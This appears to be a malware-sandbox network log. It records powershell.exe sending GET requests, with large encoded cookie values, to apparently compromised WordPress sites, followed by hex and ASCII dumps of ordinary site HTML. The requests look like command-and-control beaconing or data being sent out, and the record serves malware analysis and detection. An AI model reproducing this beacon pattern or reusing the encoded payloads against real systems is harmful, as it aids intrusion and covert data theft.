                                                    2024-12-18 10:20:11 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63 6f 6e 74 65 6e 74 3d 22 31 35
                                                    Data Ascii: content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" content="15
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67
                                                    Data Ascii: 0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_term_string
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c
                                                    Data Ascii: k&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0644\u0633\
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a
                                                    Data Ascii: 645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12-18T10:26:
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65
                                                    Data Ascii: /emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(ne
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22
                                                    Data Ascii: uently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports"
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69
                                                    Data Ascii: .everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.11.2049730129.232.136.1704438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:20:20 UTC2253OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:20:22 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:20:20 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:20:22 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:20:22 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:20:22 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:22 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:20:22 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:20:22 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:22 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:20:22 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:20:22 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:22 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.11.2049731172.105.162.74431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:20:32 UTC2259OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: acceleratedigital.com.au
                                                    Connection: Close
                                                    2024-12-18 10:20:34 UTC489INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:20:31 GMT
                                                    Server: Apache
                                                    X-Pingback: https://acceleratedigital.com.au/xmlrpc.php
                                                    Link: <https://acceleratedigital.com.au/wp-json/>; rel="https://api.w.org/", <https://acceleratedigital.com.au/wp-json/wp/v2/pages/14378>; rel="alternate"; title="JSON"; type="application/json", <https://acceleratedigital.com.au/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:20:34 UTC7703INData Raw: 31 0d 0a 09 0d 0a 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 0a 09 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 63 63 65 6c 65 72 61 74 65 20 44 69 67 69 74 61 6c
                                                    Data Ascii: 12000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"> <meta name="description" content="Accelerate Digital
                                                    2024-12-18 10:20:34 UTC501INData Raw: 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32
                                                    Data Ascii: radient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--2
                                                    2024-12-18 10:20:34 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:34 UTC8192INData Raw: 32 30 30 30 0d 0a 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c
                                                    Data Ascii: 2000: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0,
                                                    2024-12-18 10:20:34 UTC6INData Raw: 61 6c 2e 63 6f 6d
                                                    Data Ascii: al.com
                                                    2024-12-18 10:20:34 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
